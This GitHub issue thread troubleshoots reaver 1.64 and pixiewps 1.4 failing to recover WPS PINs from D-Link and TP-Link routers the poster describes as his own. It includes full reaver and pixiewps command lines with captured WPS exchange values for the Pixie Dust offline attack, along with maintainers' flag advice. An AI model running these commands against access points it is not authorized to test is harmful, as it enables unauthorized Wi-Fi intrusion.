t6x/reaver-wps-fork-t6x #235: reaver 1.64/  Pixie 1.4 failed to retrieve wps code

chams1012, 2018-05-10:
hi everyone so I have Got few routers in hand Dlink850l / Dir803 /Tplink 
Everythink was working just fine with reaver 1.52 and pixiewps 1.2 this days updated my kali with the new reaver and pixie 1.4 but nothing seems to be working , it always come back with wps not found 
i thought maybe my 850l has done some auto updates and become vulnerable so i tried again on my old ones (used to get wps within a second (picture bellow ) and has not been conected to internet for auto update but not luck i was thinking maybe an issue with reaver 1.64   
ps: all router right infront of me and no problem with distance 
i have tried also the option -p come back with 
 [*] Failed to recover WPA key
 [*] String pin was specified, nothing to save.
- anybody have an idea ?
[image]

rofl0r, 2018-05-10:
that screenshot looks like you run reaver via some script. try by doing everything by hand and report the steps and their output here so we can reason about what's going wrong.

chams1012, 2018-05-10:
hi @rofl0r  
i actually run the command
root@kali:~# reaver -i wlan0mon -b 54:B8:0A:XX:XX:XX  -c 1 -vv -K 1 -f
this was the same command i used to use in the old versions

rofl0r, 2018-05-10:
-K option does no longer take a parameter

when -K is used reaver does no longer try the pin found by pixiewps in one go.
you have to start reaver again passing the pin with -p XXXXYYYY instead of -K.

chams1012, 2018-05-10:
thank you @rofl0r  for your quick answer 
so i tried again without the -K 
reaver -i wlan0mon -b 54:B8:0A:XX:XX:XX  -c 1 -vv  -f

however now reaver tries up till the WPS get blocked 
WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
So now i restarted the AP and fired the same command but same outcome 
what i  do not understand before in the older version all my routers gets cracked within a second 
now with the same AP and a recent updates nothing seems to be working :(

chams1012, 2018-05-10:
The output sent on the previous comment was with -f 
Reaver -i wlan0mon -b 54:B8:0A:15:EA:E0 -c 1  -vv -K -f
Did i do something wrong ? 
I appreciate your help

soxrok2212, 2018-05-10:
Just execute pixiewps with the `f` flag.

```
pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s d4b46c61594700c66d092bd378d0273a3b71d6bfbf339a2e6fd6a617d7f4aaa8 -z 3ecf205486b6bac2fac0d9bf50426e7442e67400106854e9929855d22874724f -a 35ef21efff8fd5a28b8c4421d0f0ceda216da50439aa67f8f8911ec0a6c57053 -n 0133edc7787448c81d53ff01222c5491 -r 9a2d32d968b5285116203d9b91bb5e8813fde92c618a97164108d4f59061c089c926cd1eb6ffa2ae01ecd8a9688605754795ccd02dff3cc4f1ac3c24967f5dd4f732b2a0c2858de507e209e9146ce184711de05c46147366040da835d41b0390334f9ffffdf6c0884675518e4aa399e771bf78ebfb0d76dc7f8b413f6f95689ad8cfb1ae1ada1add2577154e0834943f83a04db7fdfcafa2f4cbd12281aa6ce78cbc3dbab8c3818db4923bd75b9f6c81f91a880554c58766032ce5fc891c52a5 -f
```

chams1012, 2018-05-10:
Ah it has to be done manually , i will try that asap when im back and post again the output  
Ones again thanks a million :)

chams1012, 2018-05-12:
hi again :)
so i tried on the dir803 with -f and it worked smoothly however when i try in my 850l it comes back with the same outcome 
still reaver finds the -e , -r -s -z -a and -n however pixie failed to retrieve the wps pin from those infos , 
does this mean the 850l is vulnerable ?
root@kali:~# pixiewps -e d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b -s 3b36956fe20502fd6fe54d0d1223b80e44f24378895c6a3dcb877324c31466d6 -z 5bceb587fd1f65b1dc1819add76e30c7abd531df28a1a7bcec7e9b0e91404e1e -a 64df664cf2c9479b87dba8f080b5eaea82f37cd8626fbca9573bd17530c7e6c9 -n 66e66e2b6fc645a20d5379a1bea294b2 -r 0be225988d85b6f564d0a561bdef1b653b43680f8ec32ad3458ed806cd6a97da8edc80bb5b36bcde8938ec279b4705d3e47c3ed6285e6a89dacd750ff7f7c91ac850e41440c71eef9d8db2291f50785158d1291dd1e7692aeafcf7cf1169af23546351e1a2d6d36e55b30bd90c729c51a219c9f214214144cf4ca3569ac6bae0b073f12da07905762f22f3a7b96ca6d23e51c607e5c36e354303f669e9e1fc7ce457fb94db4a38a4360be3f32df01f7c4a3aad28a1273e3c4485b28ce0f71c9b -f
 
 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 51 ms

rofl0r, 2018-05-12:
did it work earlier ? try with old pixiewps maybe. you can paste the same commandline.

redw0lfx, 2018-06-01:
hey chams, 

Have you had any progress?  Confirmed the router is no longer vulnerable? 
I'm trying to figure this out as well,  looking to confirm what versions I should use for reaver and pixie and possibly libpcap to eliminate the culprit. Currenty running an up to date kali and getting no pin found.

soxrok2212, 2018-06-01:
Realtek has been patching devices, which is a good thing! It’s about time.